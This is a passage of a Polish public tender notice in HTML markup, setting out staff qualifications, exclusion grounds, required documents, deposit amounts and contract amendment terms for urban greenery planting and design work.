zawodowychnabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016 r., poz. 65) lub zgodnie zwcześniej obowiązującymi przepisami dotyczące uznawania kwalifikacji, oraz 2.3. - ogrodnik - (1osoba o minimalnych poziomach zdolności określonych poniżej) osoba posiadająca co najmniejśrednie wykształcenie ogrodnicze lub leśnicze, oraz minimum 2 lata doświadczenia w pracy przynasadzaniu zieleni wysokiej i niskiej, w tym na co najmniej 1 zadaniu obejmującym nasadzenie wterenie miejskim: drzew lub krzewów w liczbie co najmniej 100 szt. (okres doświadczeniaWykonawca wskaże w miesiącach), oraz Dla części 2: 2.4. - projektant zieleni - (1 osoba ominimalnych poziomach zdolności określonych poniżej) osoba posiadająca wykształcenie wyższepo ukończeniu studiów na kierunku architektura krajobrazu oraz posiadająca doświadczeniepolegające na wykonaniu jako architekt krajobrazu co najmniej dwóch projektów, każdyobejmujący zaprojektowanie nasadzeń zieleni niskiej i wysokiej na powierzchni minimum 0,2 ha wterenie miejskim oraz 2.5. - projektant branży drogowej - (1 osoba o minimalnych poziomachzdolności określonych poniżej) osoba posiadająca uprawnienia budowlane do projektowania wspecjalności inżynieryjnej drogowej, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawobudowlane (t.j. Dz. U. z 2016, poz. 290 ze zm.) oraz w Rozporządzeniu Ministra Infrastruktury iRozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych wbudownictwie (Dz. U. 2014 poz. 1278) lub odpowiadające im ważne uprawnienia budowlanewydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwyorgan, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowychnabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016 r., poz. 65) lub zgodnie zwcześniej obowiązującymi przepisami dotyczące uznawania kwalifikacji, oraz 2.6. - ogrodnik - (1osoba o minimalnych poziomach zdolności określonych poniżej) osoba posiadająca co najmniejśrednie wykształcenie ogrodnicze lub leśnicze, oraz minimum 2 lata doświadczenia w pracy przynasadzaniu zieleni wysokiej i niskiej, w tym na co najmniej 1 zamówieniu obejmującym nasadzeniew terenie miejskim: drzew w liczbie co najmniej 50 szt. (okres doświadczenia Wykonawca wskażew miesiącach), Dla części 3: 2.7. - ogrodnik - (1 osoba o minimalnych poziomach zdolnościokreślonych poniżej) osoba posiadająca co najmniej średnie wykształcenie ogrodnicze lub leśnicze,oraz minimum 2 lata doświadczenia w pracy przy nasadzaniu zieleni wysokiej i niskiej, w tym naco najmniej 1 zamówieniu obejmującym nasadzenie w terenie miejskim: drzew lub krzewów wliczbie co najmniej 100 szt. (okres doświadczenia Wykonawca wskaże w miesiącach).Zamawiający wyjaśnia, że: a) osoby posiadające uprawnienia budowlane wydane na terenie UEmogą uzyskać decyzję w sprawie uznania kwalifikacji zawodowych oraz wpis do stosownej izby nazasadach określonych w Ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacjizawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016 r., poz. 65)oraz w Regulaminie postępowania w sprawie uznawania kwalifikacji do wykonywaniasamodzielnych funkcji technicznych w budownictwie obywateli państw członkowskich UniiEuropejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumieniao Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli wtych państwach, kwalifikacje odpowiadające uprawnieniom budowlanym w Polsce. (Załącznik douchwały Krajowej Rady Polskiej Izby Inżynierów Budownictwa Uchwała nr 7/R/16 Krajowej RadyPolskiej Izby Inżynierów Budownictwa z dnia 18 maja 2016 r.) W razie uzyskania uznaniakwalifikacji w zakresie wymaganym zgodnie z postanowieniami niniejszego punktu oraz wpisu doIzby Inżynierów Budownictwa uznaje się, że Wykonawca wykazał spełnienie warunkówokreślonych w tym zakresie. b) Funkcje, o których mowa w pkt 2.1. - 2.7. mogą być łączone. c)Zamawiający pod pojęciem teren miejski, o którym mowa powyżej, rozumie teren zabudowanyposiadający uzbrojenie podziemne, położony w granicach administracyjnych miasta.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Zamawiający zgodnie z art. 26 ust. 2 ustawy pzp przed udzieleniem zamówienia, może wezwaćWykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym, nie krótszymniż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzającychokoliczności, o których mowa w pkt. 9 IDW tj: 1. Odpis właściwego rejestru lub z centralnejewidencji i informacji o działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu dorejestru lub ewidencji w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24.ust. 5 pkt.1 ustawy pzp. 2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania pozaterytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt III.4.1.niniejszego ogłoszenia składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibęlub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszonoupadłości; 3. Dokumenty, o których mowa w pkt. 2 powinny być wystawione nie wcześniej niż 6miesięcy przed upływem terminu składania ofert. 4. Stosownie do treści § 7 ust. 3 rozporządzeniaw sprawie dokumentów, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejscezamieszkania lub kraju, w którym miejsce zamieszkania mają osoby, których dokument dotyczy niewydaje się dokumentów, o których mowa w pkt. 2 zastępuje się je dokumentem zawierającymodpowiednio oświadczenie, Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jegoreprezentacji, lub oświadczeniem osoby, której dokument miał dotyczyć złożone przed notariuszemlub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lubgospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lubmiejsce zamieszkania tej osoby. Postanowienia pkt 3. niniejszego ogłoszenia znajdują odpowiedniezastosowanie.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Zamawiający zgodnie z art. 26 ust. 2 ustawy pzp przed udzieleniem zamówienia, może wezwaćWykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym, nie krótszymniż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzającychokoliczności, o których mowa w pkt. 9 IDW tj: 1. wykaz usług, wykonanych w okresie ostatnichpięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jestkrótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, narzecz których usługi zostały wykonane, sporządzony według wzoru stanowiącego załącznik nr 4 doIDW - wykaz ten powinien zawierać dane niezbędne do oceny warunku udziału w postępowaniu, októrym mowa w pkt. 9.1.1.1./9.1.1.2/9.1.1.3. IDW (w zależności od części o którą ubiega sięwykonawca), z załączeniem dowodów, określające czy zostały usługi zostały wykonane należycie,przy czym dowodami o których mowa powyżej są referencje bądź inne dokumenty wystawioneprzez podmiot na rzecz którego usługi były wykonywane a jeżeli z uzasadnionej przyczyny oobiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenieWykonawcy. 2. wykaz osób, o których mowa w pkt 9.1.2.2. oraz w pkt. 9.1.2.5. IDW sporządzonywedług wzoru stanowiącego załącznik nr 5 do IDW - wykaz ten powinien zawierać dane niezbędnedo oceny warunków udziału w postępowaniu, o których mowa w pkt. 9.1.2.2. oraz w pkt. 9.1.2.5.IDW tj. imienia i nazwiska wskazanej osoby oraz zakresu posiadanych uprawnień, przy czymZamawiający wymaga aby w stosunku do każdej z ww. osób wskazać podstawy dysponowania ww.osobami.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wykonawca składający ofertę zobowiązany jest wnieść wadium w wysokości: Numer części Kwotawadium [PLN] Słownie 1 3000,00 Trzy tysiące złotych 00/100 2 1000,00 Jeden tysiąc złotych00/100 3 3000,00 Trzy tysiące złotych 00/100 W przypadku złożenia oferty na więcej niż jednączęść zamówienia Wykonawca zobowiązany jest do wniesienia wadium w wysokości wynikającej zsumy kwot wadium na poszczególne części wraz z podaniem numerów części, na które wnosiwadium.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej"></span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Wszelkie zmiany umowy mogą być dokonane za zgodą obu Stron wyrażoną na piśmie pod rygoremnieważności. 2. Zamawiający przewiduje możliwość zmiany do Umowy w przypadku zaistnienianastępujących okoliczności, które nie zostały lub nie mogły być przewidziane w czasie prowadzeniapostępowania: 1) Zmian ogólnie obowiązujących przepisów, prawa miejscowego oraz wymogówdotyczących Zamawiającego bezpośrednio odnoszących się do praw i obowiązków stron umowy;zmiany umowy dokonane mogą być tylko w zakresie niezbędnym do dostosowania zapisów umowydo wprowadzonych przepisów. 2) Zmian w zakresie terminów realizacji inwestycji spowodowanychprzyczynami niezależnymi od Wykonawcy, skutkującymi niemożliwością lub utrudnieniami wterminowym prowadzeniu prac, w szczególności: wystąpienie konieczności wykonania robótdodatkowych, zamiennych wstrzymujących lub opóźniających realizację robót będących przedmiotemumowy; W przypadku wystąpienia takich okoliczności termin może ulec odpowiedniemu przedłużeniuo czas niezbędny do wykonania przedmiotu umowy w sposób należyty, nie dłużej jednak niż o okrestrwania tych okoliczności. W sytuacji wprowadzenia zmian w zakresie terminu realizacji oraz jakokonsekwencja ich wprowadzenia Zamawiający dopuszcza możliwość wprowadzenia zmiandotyczących sposobu rozliczenia niniejszej umowy, o ile taka zmiana będzie korzystna dlaZamawiającego. 3) Zmian w zakresie realizacji inwestycji z przyczyn technicznych, które nie mogłybyć przewidziane w czasie prowadzenia postępowania, w tym przede wszystkim w zakresieniezinwentaryzowanego mienia, odkryć archeologicznych i podobnych przeszkód, które zostałyujawnione podczas wykonywania prac. Zmiana zakresu zamówienia określonego w SIWZ, jestmożliwa tylko z zakresie niezbędnym, aby wykonawca po ustaniu lub usunięciu przeszkód mógłwykonać przedmiot umowy w sposób zgodny z SIWZ. 4) Zmian w zakresie realizacji inwestycji, którenie mogły być przewidziane w czasie prowadzenia postępowania z przyczyn technicznych, apolegających na obiektywnej konieczności zmiany technologii wykonania przedmiotu zamówienia,zastosowania rozwiązań zamiennych, zastępczych lub równoważnych. Zmiana zakresu pracokreślonego w SIWZ, jest możliwa tylko w zakresie niezbędnym do zgodnego z obowiązującymistandardami, wymaganiami technicznymi oraz normami prawidłowego wykonania przedmiotu umowyw sposób zgodny z SIWZ. 5) Zmiana może nastąpić również wtedy, gdy Zamawiający z przyczynekonomicznych, technicznych lub prawnych zmieni sposób wykonania przedmiotu zamówieniawprowadzając inne rozwiązania techniczne lub projektowe z korzyścią dla interesu publicznego. 6)Zmiana może nastąpić również wtedy kiedy zaistnieje konieczność zrealizowania Umowy przyzastosowaniu innych rozwiązań technicznych /technologicznych lub materiałowych niż wskazane wdokumentach Umowy, m.in. w sytuacji stwierdzenia wad/usterek lub niekompletności tejdokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, w sytuacji, gdybyzastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem Umowy,7) Jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone znadmiernymi trudnościami albo groziłoby Wykonawcy rażącą stratą, czego strony nie przewidywałyprzy zawarciu umowy, Zamawiający dopuszcza możliwość zmiany umowy, poprzez zmianę sposobujej wykonania, opierając się na zasadach współżycia społecznego, interesów Zamawiającego iWykonawcy. Przy czym zmiana umowy dopuszczalna jest tylko w zakresie usunięcia rażącej stratyjaką poniósłby Wykonawca w związku z wykonaniem zamówienia, 8) Zmiany w zakresiezmniejszenia zakresu rzeczowego zamówienia. W przypadku zmniejszenia zakresu robótwynagrodzenie Wykonawcy zostanie stosownie obniżone. 9) W przypadku, gdy w umowie znajdująsię oczywiste błędy pisarskie lub rachunkowe, a także zapisy, których wykonanie jest niemożliwe zuwagi na obowiązujące przepisy prawa - w zakresie, który jest niezbędny dla usunięcia tych błędów,10) Strony dopuszczają zmianę sposobu wykonania umowy ze względu na zaistnienie siły wyższej.Zmiana umowy dopuszczalna jest tylko w takim zakresie, aby po ustaniu działania siły wyższej,Wykonawca mógł wykonać przedmiot zamówienia w sposób zgodny z SIWZ. Pod pojęciem "siływyższej" rozumie się wszystkie zdarzenia zewnętrzne niemożliwe do przewidzenia i niemożliwe dozapobieżenia przez strony(ę) umowy, a zaistniałe po podpisaniu umowy, w szczególności takie jak: a)wojny, działania wojenne, inwazje, działania wrogów zagranicznych, b) terroryzm, rewolucje,powstania, wojny domowe, c) rozruchy z wyjątkiem tych, które są ograniczone wyłącznie dopracowników Wykonawcy lub jego podwykonawców lub Zamawiającego, d) zanieczyszczenie i innepodobnie niebezpieczne 